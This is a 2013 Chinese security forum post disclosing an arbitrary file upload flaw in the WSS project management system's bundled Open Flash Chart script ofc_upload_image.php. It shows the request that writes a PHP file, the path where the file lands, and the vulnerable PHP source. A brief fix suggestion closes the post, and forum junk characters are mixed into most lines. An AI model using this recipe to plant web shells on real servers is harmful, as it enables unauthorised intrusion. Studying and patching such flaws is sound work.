找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2523|回复: 0
打印 上一主题 下一主题

WSS项目管理系统Post get shell

[复制链接]
跳转到指定楼层
楼主
发表于 2013-2-23 12:38:58 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
POST 数据漏洞文件执行任意后缀文件保存
2 G! r& C7 z; ]' W6 s! Z+ T5 E 漏洞文件/chart/php-ofc-library/ofc_upload_image.php
' s* [2 Q. k4 ], a4 ?1 m- N% z: K* v- p/ N+ k" I7 |3 w* o
利用:
: |2 [2 D' h) U/chart/php-ofc-library/ofc_upload_image.php?name=hfy.php hfy.php 文件名
, }+ g5 a+ _0 b, Z. @2 Z
) N" H  y, v3 G" Z! b  P# NPost任意数据5 h0 N: w; x/ ]2 C3 D# F
保存位置http://localhost/chart/tmp-upload-images/hfy.php+ B, q% D" F0 _4 T& j; ^* s

% z) u8 j, l% K  y5 }. c
' g) n4 |1 |% M( r最新版wss漏洞文件,即使是收费版本也有的,在新浪商店部署的demo~
5 o4 g7 n" c$ w7 a2 M& z' a  b8 [( F5 r% H0 _/ B4 b
<?php' T) {3 c# \5 ]: r

9 W5 d& ~. G! k; M! B/ `//" Z; F+ h4 y8 @
// In Open Flash Chart -> save_image debug mode, you0 D( G8 H- ~& }7 y
// will see the 'echo' text in a new window.
3 v6 j" @: ]# U$ D+ m) j//4 t+ D" }( R9 ^4 e: l

, N; c. }! I) \5 F/*
+ \7 h8 T+ O4 i  w) T! ]' Q
& J( U$ m1 O+ Pprint_r( $_GET );+ w! G: D! p/ P) j, a, [
print_r( $_POST );
; u2 n+ c: y! F, U& ]print_r( $_FILES );
: ?( o$ K5 j9 W4 Z7 S6 V6 q4 M: J' l* V+ g% p! F( X# j" ?
print_r( $GLOBALS );
7 H3 x; [8 P& H7 H, Bprint_r( $GLOBALS["HTTP_RAW_POST_DATA"] );
# G) [- M# \$ E' n5 S
( [- O, h0 H" o- z& Y*/
5 `- G4 \5 ?4 R2 q3 W0 ~// default path for the image to be stored //$ w& d( M/ x/ I" J
$default_path = '../tmp-upload-images/';# \: Z5 t8 E' A/ @
% R* {* P2 h6 H/ K$ a8 q
if (!file_exists($default_path)) mkdir($default_path, 0777, true);
; v- h7 J" `; `+ n- z* o0 q1 p) n1 {/ b
// full path to the saved image including filename //! G: s9 W+ }4 l, X. _/ ~
$destination = $default_path . basename( $_GET[ 'name' ] ); $ K& M9 {8 j* [1 l  ~- }9 k0 k

) }0 W, F$ S) a! o/ e- @echo 'Saving your image to: '. $destination;
! o2 ?8 @4 q. @// print_r( $_POST );$ M, H6 W" w( V% L  c
// print_r( $_SERVER );
) `4 z) n) @) ]// echo $HTTP_RAW_POST_DATA;
8 e, ?  b; {2 g0 q! l0 c
- \& {2 L7 W1 a  q. R- P: b; N/// R$ j0 g$ J* A3 P0 d9 X
// POST data is usually string data, but we are passing a RAW .png
5 |. `0 Y+ H; w' `% v/ W) F0 ]// so PHP is a bit confused and $_POST is empty. But it has saved* {* S. v. t: b- Z
// the raw bits into $HTTP_RAW_POST_DATA
- M! w2 o- ?( Q+ s! S9 O9 S//
8 d5 x% `! U3 }$ @) A' k, x+ D( [  n2 q
$jfh = fopen($destination, 'w') or die("can't open file");3 F/ L) k: a/ t) Y' O0 @8 _
fwrite($jfh, $HTTP_RAW_POST_DATA);* |  \6 R  W! C$ `  {# y+ x
fclose($jfh);5 o% }1 @- Y9 y8 c' g
7 n) D' @; z& m- f7 U2 [& o$ ]& X3 F- _
//9 U8 ?; U2 `0 b1 Z3 U0 o- `( U
// LOOK:$ [- e4 d. I3 ?# J  t
//, H) K: Q; |; v7 K* d
exit();& l0 _& y, b0 h: ^% p+ d6 P* g
//- b5 X5 l, o5 u1 ?, T
// PHP5:) z: l1 w3 s; G1 B1 y( i5 n
//
8 u- X% D0 |  h' f* I
1 ^% r( L0 @4 n. m/ L
7 t7 i8 w) E$ R& }6 ^: ^! W; P// default path for the image to be stored //
1 n! h+ u$ U8 s, X( G0 }1 @$default_path = 'tmp-upload-images/';
; K. M% C7 x. V( a/ W$ Y! ]0 q* T7 t
if (!file_exists($default_path)) mkdir($default_path, 0777, true);
" n- g( q# t' D8 x
5 d% D) u6 h$ e' L// full path to the saved image including filename //
! J- j9 \2 K+ e4 _% ~( R7 t- C$destination = $default_path . basename( $_FILES[ 'Filedata' ][ 'name' ] );
! G% v; h% q. t3 d
) s; e8 ^0 k6 I9 z3 \// move the image into the specified directory //
* ^8 ?; f* G  L* n& C6 xif (move_uploaded_file($_FILES[ 'Filedata' ][ 'tmp_name' ], $destination)) {: Z/ x2 L3 c6 D& e1 f. [7 O
    echo "The file " . basename( $_FILES[ 'Filedata' ][ 'name' ] ) . " has been uploaded;";* X# w& e* V* \) U( k$ u! |
} else {; G! j! r& s( t$ f- D
    echo "FILE UPLOAD FAILED";
2 K- M% B6 R% [( i4 o}" j4 F5 b5 {0 z" u% A5 G3 k/ C

$ P  K2 c1 N0 t
9 {! P6 E! f% i3 W5 t  }' M( Z- t?>% r/ Y2 H+ }' k) N- d' P

5 U6 [2 n7 X% y  A
% |: X1 a' j) z) f3 v9 j- M+ {0 o0 }$ m$ b9 J8 g
# j8 Q/ J0 H- J; U, O
' @6 m2 l! Q0 ]8 f& N3 a
) [" O$ U5 a4 Y# h; |" T+ z  X& V  a
修复方案:
9 ]: h/ F4 i$ Q& f& g这个漏洞文件就是个杯具,怎么破,加权限验证,后缀等验证~,自己搞
) d5 W6 \9 a' v
  X) `. z  V. ?+ u0 Q, r
0 ]+ l! ^6 u- T0 U( _9 K
8 ]8 W% ~& p) o( V5 [- Y1 ~7 p5 R" g8 Z( d# Q0 Y* [0 X" l

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?立即注册

x
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表